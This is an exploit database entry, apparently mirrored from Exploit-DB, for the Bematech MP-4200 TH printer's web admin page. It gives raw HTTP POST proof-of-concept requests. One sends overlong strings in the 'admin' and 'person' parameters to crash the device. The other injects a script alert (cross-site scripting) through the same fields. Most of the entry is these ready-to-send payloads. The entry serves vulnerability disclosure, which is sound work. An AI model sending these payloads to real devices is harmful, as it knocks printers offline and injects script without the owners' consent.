Bematech Printer MP-4200 - Denial of Service

vendor:

MP-4200 TH

by:

Jonatas Fil

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: MP-4200 TH

Affected Version From: MP-4200 TH

Affected Version To: MP-4200 TH

Patch Exists: NO

Related CWE: N/A

CPE: h:bematech:mp-4200_th

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows and Linux

2019

Bematech Printer MP-4200 – Denial of Service

An attacker can send a specially crafted HTTP POST request to the target server, containing a malicious payload in the form of a long string of characters in the 'admin' and 'person' parameters. This will cause the server to crash, resulting in a denial of service.

Mitigation:

Ensure that the application is configured to reject requests that contain malicious payloads.

Source

Exploit-DB raw data:

# Exploit Title: Bematech Printer MP-4200 - Denial of Service 
# Date: 2019-11-11
# Exploit Author: Jonatas Fil
# Vendor Homepage: https://www.bematech.com.br/
# Software Link: https://www.bematech.com.br/produto/mp-4200-th/
# Version: MP-4200 TH
# Tested on: Windows and Linux
# CVE : N/A

DoS Poc:
--------------------------------------------------------------------------------------------------------
POST /en/conf_admin.html HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/73.0.3683.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,pt;q=0.8
Cache-Control: max-age=0
Referer: http://TARGET/en/conf_admin.html
Content-Length: 40
Content-Type: application/x-www-form-urlencoded

admin=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&person=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&SUBMIT_ADMIN=Submit

--------------------------------------------------------------------------------------------------------
XSS Poc:
--------------------------------------------------------------------------------------------------------
POST /en/conf_admin.html HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/73.0.3683.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,pt;q=0.8
Cache-Control: max-age=0
Referer: http://printer.com/en/conf_admin.html
Content-Length: 40
Content-Type: application/x-www-form-urlencoded

admin=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&person=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&SUBMIT_ADMIN=Submit